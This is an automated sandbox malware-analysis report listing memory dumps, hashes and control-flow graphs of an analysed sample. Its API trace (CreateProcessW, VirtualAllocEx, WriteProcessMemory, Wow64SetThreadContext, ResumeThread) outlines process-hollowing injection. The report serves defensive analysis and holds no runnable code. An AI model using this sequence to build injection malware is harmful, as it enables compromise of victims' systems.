                                • Source File: 0000000C.00000002.1662827978.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f30000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d1f53fad6ef81311e4336db3fcdb58885724f040cbd4088a9ed65c3130d5355a
                                • Instruction ID: 7495928e85faceb6b0c6be0b1c455294a6ebd289676ff828bb7f53def677e77e
                                • Opcode Fuzzy Hash: d1f53fad6ef81311e4336db3fcdb58885724f040cbd4088a9ed65c3130d5355a
                                • Instruction Fuzzy Hash: A111C13411A31A8FDB06FF18F8C2A4577A5F784A067009A64D4488F61DD7706DAA8F92

                                Execution Graph

                                Execution Coverage:32.5%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:50
                                Total number of Limit Nodes:4
                                execution_graph 4058 2d85f98 4059 2d85fb2 4058->4059 4060 2d86001 4059->4060 4062 2d86450 4059->4062 4063 2d86483 4062->4063 4066 2d84024 4063->4066 4065 2d86677 4065->4059 4067 2d86eb0 CreateProcessW 4066->4067 4069 2d87096 4067->4069 4070 2d81fd8 ReadProcessMemory 4071 2d82097 4070->4071 4072 2d821f8 4073 2d82261 4072->4073 4074 2d82276 WriteProcessMemory 4072->4074 4073->4074 4075 2d822d8 4074->4075 4076 2d82338 ResumeThread 4077 2d823c0 4076->4077 4111 2d81ec8 4112 2d81f3b Wow64SetThreadContext 4111->4112 4113 2d81f26 4111->4113 4114 2d81f84 4112->4114 4113->4112 4115 2d81ba8 4116 2d81c35 CreateProcessW 4115->4116 4118 2d81d8e 4116->4118 4118->4118 4082 2d871d0 4084 2d871ea 4082->4084 4083 2d87239 4084->4083 4089 2d87288 4084->4089 4093 2d87284 4084->4093 4097 2d8727c 4084->4097 4101 2d87279 4084->4101 4091 2d87289 4089->4091 4105 2d8614c 4091->4105 4092 2d874af 4092->4084 4095 2d872bb 4093->4095 4094 2d8614c CreateProcessW 4096 2d874af 4094->4096 4095->4094 4096->4084 4099 2d87289 4097->4099 4098 2d8614c CreateProcessW 4100 2d874af 4098->4100 4099->4098 4100->4084 4103 2d87281 4101->4103 4102 2d8614c CreateProcessW 4104 2d874af 4102->4104 4103->4102 4104->4084 4106 2d87ce8 CreateProcessW 4105->4106 4108 2d87ece 4106->4108 4109 2d820f0 VirtualAllocEx 4110 2d821a7 4109->4110 4119 2d84e40 4120 2d84ecd CreateProcessW 4119->4120 4122 2d85026 4120->4122

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 517 2d81b9c-2d81c33 520 2d81c4a-2d81c58 517->520 521 2d81c35-2d81c47 517->521 522 2d81c5a-2d81c6c 520->522 523 2d81c6f-2d81cab 520->523 521->520 522->523 524 2d81cad-2d81cbc 523->524 525 2d81cbf-2d81d8c CreateProcessW 523->525 524->525 529 2d81d8e-2d81d94 525->529 530 2d81d95-2d81e54 525->530 529->530 540 2d81e8a-2d81e95 530->540 541 2d81e56-2d81e7f 530->541 545 2d81e96 540->545 541->540 545->545
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02D81D79
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1706103338.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_2d80000_Service.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 0e7126395f9fa6893352cda7b2d61dbc682a3137be4604d6af9da6027fb49801
                                • Instruction ID: 56c875fe8a9305056d696f862ef7d9c08a0c36b1c05cba22cad7b9a620508ab6
                                • Opcode Fuzzy Hash: 0e7126395f9fa6893352cda7b2d61dbc682a3137be4604d6af9da6027fb49801
                                • Instruction Fuzzy Hash: 8E81C075D0026ADFDB21DFA5C880BDDBBF5AF49300F1091AAE508B7260DB709A89CF54

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 546 2d84024-2d86f3b 548 2d86f3d-2d86f4f 546->548 549 2d86f52-2d86f60 546->549 548->549 550 2d86f62-2d86f74 549->550 551 2d86f77-2d86fb3 549->551 550->551 552 2d86fb5-2d86fc4 551->552 553 2d86fc7-2d87094 CreateProcessW 551->553 552->553 557 2d8709d-2d8715c 553->557 558 2d87096-2d8709c 553->558 568 2d8715e-2d87187 557->568 569 2d87192-2d8719d 557->569 558->557 568->569 573 2d8719e 569->573 573->573
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 02D87081
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1706103338.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_2d80000_Service.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 8c923ea32032048f35bc936b838ef65f309b97db28c9e32770bf1c81cd9eec49
                                • Instruction ID: f6ba7fdb85c6ac395009664912e39261cfcecd1c9bf214cfad353707f76e7ff9
                                • Opcode Fuzzy Hash: 8c923ea32032048f35bc936b838ef65f309b97db28c9e32770bf1c81cd9eec49
                                • Instruction Fuzzy Hash: 9881C175D0026ACFDB20DFA5C880BEDBBF5AB49300F1095AAE508B7250DB709E89CF54

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 601 2d8614c-2d87d73 603 2d87d8a-2d87d98 601->603 604 2d87d75-2d87d87 601->604 605 2d87d9a-2d87dac 603->605 606 2d87daf-2d87deb 603->606 604->603 605->606 607 2d87ded-2d87dfc 606->607 608 2d87dff-2d87ecc CreateProcessW 606->608 607->608 612 2d87ece-2d87ed4 608->612 613 2d87ed5-2d87f94 608->613 612->613 623 2d87fca-2d87fd5 613->623 624 2d87f96-2d87fbf 613->624 627 2d87fd6 623->627 624->623 627->627
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 02D87EB9
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1706103338.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_2d80000_Service.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: c87d26e5d16e32af8e4a6e0d9a1de1b4a085e1c62b80de4260c71907d767295a
                                • Instruction ID: 0b541bcfe18255c894f9842ffa8e626fa9a45ab92d7fdfb96dd2edbce6bd3515
                                • Opcode Fuzzy Hash: c87d26e5d16e32af8e4a6e0d9a1de1b4a085e1c62b80de4260c71907d767295a
                                • Instruction Fuzzy Hash: D981C275D0022ACFDB20DFA5C840BEDBBB5BB49304F1095AAE508B7250D7709E89CF54

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 574 2d84e34-2d84ecb 575 2d84ecd-2d84edf 574->575 576 2d84ee2-2d84ef0 574->576 575->576 577 2d84ef2-2d84f04 576->577 578 2d84f07-2d84f43 576->578 577->578 579 2d84f45-2d84f54 578->579 580 2d84f57-2d85024 CreateProcessW 578->580 579->580 584 2d8502d-2d850ec 580->584 585 2d85026-2d8502c 580->585 595 2d850ee-2d85117 584->595 596 2d85122-2d8512d 584->596 585->584 595->596 600 2d8512e 596->600 600->600
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02D85011
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1706103338.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_2d80000_Service.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: cf61967b6d7e1c1ee099226c9c265a45bee22f2993c6d09247da0aa2b81ffd10
                                • Instruction ID: 6e425737a87e736559595009b58b8214ba4c75c806d7eea4eb195cb5c50618df
                                • Opcode Fuzzy Hash: cf61967b6d7e1c1ee099226c9c265a45bee22f2993c6d09247da0aa2b81ffd10
                                • Instruction Fuzzy Hash: 8A81D175D0026ACFDB20DFA5C980BDDBBB1AF49300F1091AAE508B7250DB709A89CF54

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 629 2d87cdc-2d87d73 631 2d87d8a-2d87d98 629->631 632 2d87d75-2d87d87 629->632 633 2d87d9a-2d87dac 631->633 634 2d87daf-2d87deb 631->634 632->631 633->634 635 2d87ded-2d87dfc 634->635 636 2d87dff-2d87ecc CreateProcessW 634->636 635->636 640 2d87ece-2d87ed4 636->640 641 2d87ed5-2d87f94 636->641 640->641 651 2d87fca-2d87fd5 641->651 652 2d87f96-2d87fbf 641->652 655 2d87fd6 651->655 652->651 655->655
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 02D87EB9
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1706103338.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_2d80000_Service.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 5354ccba9797e6bb29a72ffaaeaa2dbc30f36c72094261e2662426593394f05c
                                • Instruction ID: c1170e91f105b36c25ea7e9e05400ff7f8c856cab8dcaa90e5c8736c7c357fed
                                • Opcode Fuzzy Hash: 5354ccba9797e6bb29a72ffaaeaa2dbc30f36c72094261e2662426593394f05c
                                • Instruction Fuzzy Hash: 7981C275D0022ADFDB21DFA5C840BDDBBB5BB49304F1095AAE508B7250DB709E89CF54

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 684 2d86ea4-2d86f3b 685 2d86f3d-2d86f4f 684->685 686 2d86f52-2d86f60 684->686 685->686 687 2d86f62-2d86f74 686->687 688 2d86f77-2d86fb3 686->688 687->688 689 2d86fb5-2d86fc4 688->689 690 2d86fc7-2d87094 CreateProcessW 688->690 689->690 694 2d8709d-2d8715c 690->694 695 2d87096-2d8709c 690->695 705 2d8715e-2d87187 694->705 706 2d87192-2d8719d 694->706 695->694 705->706 710 2d8719e 706->710 710->710
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 02D87081
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1706103338.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_2d80000_Service.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0

                                Control-flow Graph (image not preserved): first block 2d85c6c-2d85d03; contains a call to CreateProcessW
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02D85E49
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1706103338.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_2d80000_Service.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0

                                Control-flow Graph (image not preserved): first block 2d81ba8-2d81c33; contains a call to CreateProcessW
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02D81D79
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1706103338.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_2d80000_Service.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0

                                Control-flow Graph (image not preserved): first block 2d84e40-2d84ecb; contains a call to CreateProcessW
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02D85011
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1706103338.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_2d80000_Service.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0

                                Control-flow Graph (image not preserved): first block 2d85c78-2d85d03; contains a call to CreateProcessW
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02D85E49
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1706103338.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_2d80000_Service.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0

                                Control-flow Graph (image not preserved): first block 2d821f0-2d8225f; contains a call to WriteProcessMemory
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02D822C6
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1706103338.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_2d80000_Service.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02D822C6
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1706103338.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_2d80000_Service.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02D82085
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1706103338.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_2d80000_Service.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02D82085
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1706103338.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_2d80000_Service.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02D82195
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1706103338.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_2d80000_Service.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02D82195
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1706103338.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_2d80000_Service.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 02D81F72
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1706103338.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_2d80000_Service.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 02D81F72
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1706103338.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_2d80000_Service.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                APIs
                                • ResumeThread.KERNELBASE(?), ref: 02D823AE
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1706103338.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_2d80000_Service.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                APIs
                                • ResumeThread.KERNELBASE(?), ref: 02D823AE
                                Memory Dump Source
                                • Source File: 0000000D.00000002.1706103338.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_2d80000_Service.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                Strings
                                Memory Dump Source
                                • Source File: 0000000F.00000002.1734684059.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_c10000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID: q_}
                                • API String ID: 0-1077432412
                                • Opcode ID: 9cd8a063d428770bece96599e4931d7d40df09ac978db2b17997e9d8df3f8618
                                • Instruction ID: 83686d27a0a28d6e49373d94e2130dcc4fd08a7510693c0334942f0d2c722041
                                • Opcode Fuzzy Hash: 9cd8a063d428770bece96599e4931d7d40df09ac978db2b17997e9d8df3f8618
                                • Instruction Fuzzy Hash: AA518D30B052458FCB04EB3994546BE7BE6EFC6711B5884AED946CB382DF358C069791
                                Memory Dump Source
                                • Source File: 0000000F.00000002.1734684059.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_c10000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 75b883f74eafa0a60b0a04647422e9c9db89a2ba045acee7357a5b1e2114e876
                                • Instruction ID: 08fe4e7cdfe185fbb9b54a6ff82ff40bf8f19ef87f7b18ad8f2e6a606aa009d9
                                • Opcode Fuzzy Hash: 75b883f74eafa0a60b0a04647422e9c9db89a2ba045acee7357a5b1e2114e876
                                • Instruction Fuzzy Hash: 3051AB306053458FDB05FB38E8A896D7BA2BF8D2013008A6DD44BCB2B4EF309D088F91
                                Memory Dump Source
                                • Source File: 0000000F.00000002.1734684059.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_c10000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 149418ef386aeedae6212b4ce897742cf44b610dccf9762bad066356faed3617
                                • Instruction ID: 2b5f01700d1bf3178b1abdc93e6ee66d631965729edac513a17ae9f03787ae54
                                • Opcode Fuzzy Hash: 149418ef386aeedae6212b4ce897742cf44b610dccf9762bad066356faed3617
                                • Instruction Fuzzy Hash: FC919D347042058FDB05EB34E868A6E7BF2BF89601B50466DE446CB3B5EF709D058B91
                                Memory Dump Source
                                • Source File: 0000000F.00000002.1734684059.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_c10000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2daf6990999464365f6370771a34e3f7e2e83eb1a11b6c205a3aac8714dee2c7
                                • Instruction ID: 521cb5c4dc9b64bde5032d0a6f5e8d7bcc7ec1cb4127ddbfce839ea4997af507
                                • Opcode Fuzzy Hash: 2daf6990999464365f6370771a34e3f7e2e83eb1a11b6c205a3aac8714dee2c7
                                • Instruction Fuzzy Hash: FF31C4313007048BDB68BB79982467E76E2BFC86053948A2ED417CB790DF759E049FD1
                                Memory Dump Source
                                • Source File: 0000000F.00000002.1734684059.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_c10000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2c5896df2d4ed30ad1061c239be3e0a464b22abfdf053be2c3a824e39dad50a4
                                • Instruction ID: 13efd0fa4b87a4ef916c7d3568fe9fecdf742f727d2f23df3d343282eae9db22
                                • Opcode Fuzzy Hash: 2c5896df2d4ed30ad1061c239be3e0a464b22abfdf053be2c3a824e39dad50a4
                                • Instruction Fuzzy Hash: 7231BF74905309DFDB45FBB8D891AADBBB2FFC8701F204669D401AB359EB705A40CB51
                                Memory Dump Source
                                • Source File: 0000000F.00000002.1734684059.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_c10000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 51a31d56bdc0376f51500a5bd35486ba8bf2fd886e14085e9cccf4aedc8745ea
                                • Instruction ID: 30674061f4dabdeaad2532815549bfbd5eeb6179650fa5fc8678f7d42e320e00
                                • Opcode Fuzzy Hash: 51a31d56bdc0376f51500a5bd35486ba8bf2fd886e14085e9cccf4aedc8745ea
                                • Instruction Fuzzy Hash: 4C21C071B002049FDB44BBBE881836EBAEAEFCD700B64842ED54BD7391DE749D0157A1
                                Memory Dump Source
                                • Source File: 0000000F.00000002.1734684059.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_c10000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4f9199231d768e2d0c32139390d58d968a85a0b2933d6b8bda04b0a6c4b56f78
                                • Instruction ID: 26598098ee3bd7ea464e191ae8546ce2b710d970bd3a49fab1515d214f2c2c49
                                • Opcode Fuzzy Hash: 4f9199231d768e2d0c32139390d58d968a85a0b2933d6b8bda04b0a6c4b56f78
                                • Instruction Fuzzy Hash: 08219F34901309DFDB44FBB8D895AADBBB6FFC8700F104669D401AB358EB706A40CB91
                                Memory Dump Source
                                • Source File: 0000000F.00000002.1734684059.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_c10000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 196ef6fa62c128d1da6943cfbd8f6d868aef421c16d8095a651d0d42f967b326
                                • Instruction ID: 5e845bc89335ec77ac41943d444b1f2bef4e619fc5e9f6a5b58c7b72909921a8
                                • Opcode Fuzzy Hash: 196ef6fa62c128d1da6943cfbd8f6d868aef421c16d8095a651d0d42f967b326
                                • Instruction Fuzzy Hash: 6C21D430B05248CFCB45EBB889547AD7BF1EF85300F6480AED449EB291EB709E48D791
                                Memory Dump Source
                                • Source File: 0000000F.00000002.1734684059.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_15_2_c10000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9c7e75bdb988859f802be5d8fb73108d5f811b613315a4bfae1f94c86101e497
                                • Instruction ID: 7b8a10c0a01ce3aed7b692a6cd03afc3ead06e1395d1aaebc88fc1b1490279a8
                                • Opcode Fuzzy Hash: 9c7e75bdb988859f802be5d8fb73108d5f811b613315a4bfae1f94c86101e497
                                • Instruction Fuzzy Hash: 0111CB3451A35A8FDB06FF28F9E0E453BA5F7C4A05B009A6DD4488F26DDB706E098F81
                                Memory Dump Source
                                • Source File: 00000010.00000002.1735186250.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_2740000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 80e2603816266341e5c770ec1d6bafbbb8dfe78f272b3276658bfc78dd1c222f
                                • Instruction ID: 4a66bbfba82a45ded07dfc18827608f6e85f7415774e83ebd6ff6dff575969ca
                                • Opcode Fuzzy Hash: 80e2603816266341e5c770ec1d6bafbbb8dfe78f272b3276658bfc78dd1c222f
                                • Instruction Fuzzy Hash: 42515E35A003058FCB0BBB75E4A856E7BB6BFC86017005A69D40A9B269EF309D85CB81
                                Memory Dump Source
                                • Source File: 00000010.00000002.1735186250.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_2740000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a648575117c0795164d2a30396a314eb7d5f654f7492c3cf6b2287aa6f3749e7
                                • Instruction ID: 07545e69047f3287b18495468c90f73c8a4f5b761c57a02a2474c92616e2f2c5
                                • Opcode Fuzzy Hash: a648575117c0795164d2a30396a314eb7d5f654f7492c3cf6b2287aa6f3749e7
                                • Instruction Fuzzy Hash: F0918331B003058FDB0AEB75E898A2E7BF6BFC8601B105969D406DB3A5DF309D45CB81
                                Memory Dump Source
                                • Source File: 00000010.00000002.1735186250.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_2740000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f9f743a3e462326ef58e9414951714c01c82a1870344f01369d543cfa3f44c21
                                • Instruction ID: 08c04d8e49c7972b891da29be17327f6d1859caaa3604176ae9cc3eb2ad003a6
                                • Opcode Fuzzy Hash: f9f743a3e462326ef58e9414951714c01c82a1870344f01369d543cfa3f44c21
                                • Instruction Fuzzy Hash: 3B318B32700B048BDB5ABB79942426FB6E2BFC46153548E2EC41BCB780EF319E449B91
                                Memory Dump Source
                                • Source File: 00000010.00000002.1735186250.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_2740000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bb515eb773d5260326b9c3e4dd9827bf4ca6d42405fdb2793483ccc236a4674d
                                • Instruction ID: 446cbfee35220ee2077c6232a092678970a561672661baefc49e801886434b28
                                • Opcode Fuzzy Hash: bb515eb773d5260326b9c3e4dd9827bf4ca6d42405fdb2793483ccc236a4674d
                                • Instruction Fuzzy Hash: A5219371B012059BDB18ABB9885836FFAEAEFC9641B24842ED54BD7381DE348C0157A1
                                Memory Dump Source
                                • Source File: 00000010.00000002.1735186250.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_2740000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b02af2fcdf6fa0edf08d51193b25f2dc8933ca8cac8951d30dbdc29493dc830c
                                • Instruction ID: 778ee26f1326c40649c933cd49bd672621f93dd4dc623b23b70ca6f3eb20c3dc
                                • Opcode Fuzzy Hash: b02af2fcdf6fa0edf08d51193b25f2dc8933ca8cac8951d30dbdc29493dc830c
                                • Instruction Fuzzy Hash: BE317A34A04309DFDB45FBB8D8956ADBBB2FF88600F204A69D401AB348EB306A45CB51
                                Memory Dump Source
                                • Source File: 00000010.00000002.1735186250.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_2740000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 67b67b4e35dae2b2355f318dda8d457db0a01bd180952e8a9198aba0ebd378c1
                                • Instruction ID: 4f9671d58f8cac23d469e2de2200a662d6e4fab5f82981dc5c3f3c9e75a35519
                                • Opcode Fuzzy Hash: 67b67b4e35dae2b2355f318dda8d457db0a01bd180952e8a9198aba0ebd378c1
                                • Instruction Fuzzy Hash: 1F216D74A00309DFDB45FBB8D8856ADBBB2FFC8701F104A69D406AB348EB305A41CB51
                                Memory Dump Source
                                • Source File: 00000010.00000002.1735186250.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_2740000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 04336d66980d4acb75d1dc2d911747780f9cc540742818b90470e56df3c938b7
